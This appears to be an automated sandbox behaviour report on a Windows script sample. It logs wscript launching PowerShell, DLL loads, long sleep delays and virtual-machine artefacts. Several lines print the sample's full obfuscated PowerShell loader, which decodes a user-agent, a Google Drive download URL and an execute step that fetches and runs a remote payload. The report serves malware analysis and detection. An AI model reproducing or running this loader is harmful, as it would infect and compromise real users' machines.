Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: re.pdbM source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1530394780.000001C5ECC94000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbS source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1530197727.000001C5ECC80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb4 source: powershell.exe, 00000002.00000002.1529537443.000001C5ECAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1530394780.000001C5ECCEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1530394780.000001C5ECCEB000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Noshe", "0")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Chromeplated) if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView") {
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i ErklJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B2609CA push E85E455Dh; ret 2_2_00007FFB4B2609F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B260A18 push E95B64D0h; ret 2_2_00007FFB4B2609C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B2600BD pushad ; iretd 2_2_00007FFB4B2600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B260962 push E95B64D0h; ret 2_2_00007FFB4B2609C9
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3770Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6098Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 2072Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5884Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 00000000.00000002.1375520650.0000013D6CFD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1372110678.0000013D6D2C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000002.00000002.1530394780.000001C5ECC94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$D%SystemRoot%\system32\mswsock.dllDeliM sildeGavebt Bomba pre,lProdul Medli TrstfOutpoaEduc cPlesktFootsu D ferCompleRefer.Spin,DPanscoMultiw PercnWindslBevbnoEpictaungdodTjeneF Edr ichabolUndereSlagb(Sub,e$FaenoTischirButo,nunireg PlejeBegrunNonskdAffe.eCutar
Source: wscript.exe, 00000000.00000003.1371981845.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1365525218.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1364056176.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1375690007.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363491376.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373454782.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363852731.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1370814268.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5:HN
Source: wscript.exe, 00000000.00000003.1372256990.0000013D6B1A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\(
